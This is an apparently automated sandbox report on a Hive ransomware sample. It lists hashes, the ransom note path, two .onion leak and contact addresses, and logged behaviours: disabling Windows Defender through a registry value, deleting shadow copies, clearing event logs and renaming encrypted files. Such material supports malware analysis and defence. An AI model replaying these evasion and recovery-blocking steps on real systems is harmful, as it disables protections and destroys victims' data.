Analysis
-
max time kernel
126s -
max time network
133s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
12-01-2022 14:34
Static task
static1
Behavioral task
behavioral1
Sample
afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
Resource
win7-en-20211208
General
-
Target
afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
-
Size
3.8MB
-
MD5
3ef03bfba1665597a824e136fad174de
-
SHA1
b0e02886ca9c7edce20380934f78fa8e5bb931b9
-
SHA256
afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8
-
SHA512
3773754a433e885db06484ce9b4a4ff3936de153f2954c0c4c4487148fa28f8947ec2eef756f09b408fb1ca3472d8798757ee418a1e5a671ef3a0a924c364309
Malware Config
Extracted
C:\Program Files\7-Zip\wPfq_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 1328 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 1680 bcdedit.exe 1648 bcdedit.exe -
Modifies extensions of user files 8 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exedescription ioc process File renamed C:\Users\Admin\Pictures\CopySkip.png => C:\Users\Admin\Pictures\CopySkip.png.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Users\Admin\Pictures\CopySkip.png.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File renamed C:\Users\Admin\Pictures\ExitExport.tif => C:\Users\Admin\Pictures\ExitExport.tif.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Users\Admin\Pictures\ExitExport.tif.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File renamed C:\Users\Admin\Pictures\PopInitialize.tiff => C:\Users\Admin\Pictures\PopInitialize.tiff.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Users\Admin\Pictures\PopInitialize.tiff.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File renamed C:\Users\Admin\Pictures\RequestClear.tif => C:\Users\Admin\Pictures\RequestClear.tif.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Users\Admin\Pictures\RequestClear.tif.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exedescription ioc process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.xml.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs.ja_5.5.0.165303.jar.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Adak.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Midway.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\gadget.xml afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_hail.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fontconfig.properties.src.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightRegular.ttf.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HTECH_01.MID.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\wPfq_HOW_TO_DECRYPT.txt afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\es-ES\css\calendar.css afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18218_.WMF.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\MSTORE_COL.HXC.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Maroon.css.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL083.XML.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_photo_Thumbnail.bmp afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_zh_4.4.0.v20140623020002.jar.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Windows Mail\de-DE\msoeres.dll.mui afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\Adobe AIR Application Installer.swf.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Internet Explorer\en-US\iedvtool.dll.mui afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_ja_4.4.0.v20140623020002.jar.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD15072_.GIF.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\EnterRename.ppt.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Indianapolis.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_cloudy.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00640_.WMF.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDCNCL.CFG.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Common Files\System\msadc\fr-FR\msadcor.dll.mui afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\DVD Maker\bod_r.TTF afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\wPfq_HOW_TO_DECRYPT.txt afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD10256_.GIF.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Library\EUROTOOL.XLAM.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0281243.WMF.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0284916.JPG.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\wPfq_HOW_TO_DECRYPT.txt afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\UndoPush.pot.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\ja-JP\calendar.html afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00462_.WMF.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_windy.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\wPfq_HOW_TO_DECRYPT.txt afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\pl-PL\tipresx.dll.mui afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Brisbane.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02228_.WMF.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Beige.css.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN044.XML.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs_5.5.0.165303.jar.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tbilisi.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099146.WMF.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187881.WMF.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs.zh_CN_5.5.0.165303.jar.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_foggy.png afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Things\COUPLER.WAV.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WSIDBR98.POC.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\ExecutiveMergeLetter.dotx.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\booklist.gif.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01740_.GIF.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\AdjacencyReport.dotx.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Internet Explorer\en-US\F12Tools.dll.mui afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bishkek.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\de-DE\msadcor.dll.mui afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1356 vssadmin.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 2356 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exeafd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exepid process 1380 powershell.exe 1940 powershell.exe 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 1708 wevtutil.exe Token: SeBackupPrivilege 1708 wevtutil.exe Token: SeSecurityPrivilege 1700 wevtutil.exe Token: SeBackupPrivilege 1700 wevtutil.exe Token: SeSecurityPrivilege 552 wevtutil.exe Token: SeBackupPrivilege 552 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1240 wmic.exe Token: SeSecurityPrivilege 1240 wmic.exe Token: SeTakeOwnershipPrivilege 1240 wmic.exe Token: SeLoadDriverPrivilege 1240 wmic.exe Token: SeSystemProfilePrivilege 1240 wmic.exe Token: SeSystemtimePrivilege 1240 wmic.exe Token: SeProfSingleProcessPrivilege 1240 wmic.exe Token: SeIncBasePriorityPrivilege 1240 wmic.exe Token: SeCreatePagefilePrivilege 1240 wmic.exe Token: SeBackupPrivilege 1240 wmic.exe Token: SeRestorePrivilege 1240 wmic.exe Token: SeShutdownPrivilege 1240 wmic.exe Token: SeDebugPrivilege 1240 wmic.exe Token: SeSystemEnvironmentPrivilege 1240 wmic.exe Token: SeRemoteShutdownPrivilege 1240 wmic.exe Token: SeUndockPrivilege 1240 wmic.exe Token: SeManageVolumePrivilege 1240 wmic.exe Token: 33 1240 wmic.exe Token: 34 1240 wmic.exe Token: 35 1240 wmic.exe Token: SeIncreaseQuotaPrivilege 1192 wmic.exe Token: SeSecurityPrivilege 1192 wmic.exe Token: SeTakeOwnershipPrivilege 1192 wmic.exe Token: SeLoadDriverPrivilege 1192 wmic.exe Token: SeSystemProfilePrivilege 1192 wmic.exe Token: SeSystemtimePrivilege 1192 wmic.exe Token: SeProfSingleProcessPrivilege 1192 wmic.exe Token: SeIncBasePriorityPrivilege 1192 wmic.exe Token: SeCreatePagefilePrivilege 1192 wmic.exe Token: SeBackupPrivilege 1192 wmic.exe Token: SeRestorePrivilege 1192 wmic.exe Token: SeShutdownPrivilege 1192 wmic.exe Token: SeDebugPrivilege 1192 wmic.exe Token: SeSystemEnvironmentPrivilege 1192 wmic.exe Token: SeRemoteShutdownPrivilege 1192 wmic.exe Token: SeUndockPrivilege 1192 wmic.exe Token: SeManageVolumePrivilege 1192 wmic.exe Token: 33 1192 wmic.exe Token: 34 1192 wmic.exe Token: 35 1192 wmic.exe Token: SeIncreaseQuotaPrivilege 1192 wmic.exe Token: SeSecurityPrivilege 1192 wmic.exe Token: SeTakeOwnershipPrivilege 1192 wmic.exe Token: SeLoadDriverPrivilege 1192 wmic.exe Token: SeSystemProfilePrivilege 1192 wmic.exe Token: SeSystemtimePrivilege 1192 wmic.exe Token: SeProfSingleProcessPrivilege 1192 wmic.exe Token: SeIncBasePriorityPrivilege 1192 wmic.exe Token: SeCreatePagefilePrivilege 1192 wmic.exe Token: SeBackupPrivilege 1192 wmic.exe Token: SeRestorePrivilege 1192 wmic.exe Token: SeShutdownPrivilege 1192 wmic.exe Token: SeDebugPrivilege 1192 wmic.exe Token: SeSystemEnvironmentPrivilege 1192 wmic.exe Token: SeRemoteShutdownPrivilege 1192 wmic.exe Token: SeUndockPrivilege 1192 wmic.exe Token: SeManageVolumePrivilege 1192 wmic.exe Token: 33 1192 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 964 wrote to memory of 1520 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 964 wrote to memory of 1520 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 964 wrote to memory of 1520 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 1520 wrote to memory of 1912 1520 net.exe net1.exe PID 1520 wrote to memory of 1912 1520 net.exe net1.exe PID 1520 wrote to memory of 1912 1520 net.exe net1.exe PID 964 wrote to memory of 524 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 964 wrote to memory of 524 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 964 wrote to memory of 524 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 524 wrote to memory of 560 524 net.exe net1.exe PID 524 wrote to memory of 560 524 net.exe net1.exe PID 524 wrote to memory of 560 524 net.exe net1.exe PID 964 wrote to memory of 668 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 964 wrote to memory of 668 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 964 wrote to memory of 668 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 668 wrote to memory of 1472 668 net.exe net1.exe PID 668 wrote to memory of 1472 668 net.exe net1.exe PID 668 wrote to memory of 1472 668 net.exe net1.exe PID 964 wrote to memory of 784 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 964 wrote to memory of 784 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 964 wrote to memory of 784 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 784 wrote to memory of 1764 784 net.exe net1.exe PID 784 wrote to memory of 1764 784 net.exe net1.exe PID 784 wrote to memory of 1764 784 net.exe net1.exe PID 964 wrote to memory of 1744 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 964 wrote to memory of 1744 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 964 wrote to memory of 1744 964 afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe net.exe PID 1744 wrote to memory of 1356 1744 net.exe net1.exe PID 1744 wrote to memory of 1356 1744 net.exe net1.exe PID 1744 wrote to memory of 1356 1744 net.exe net1.exe PID 964 wrote to memory of 1088 964 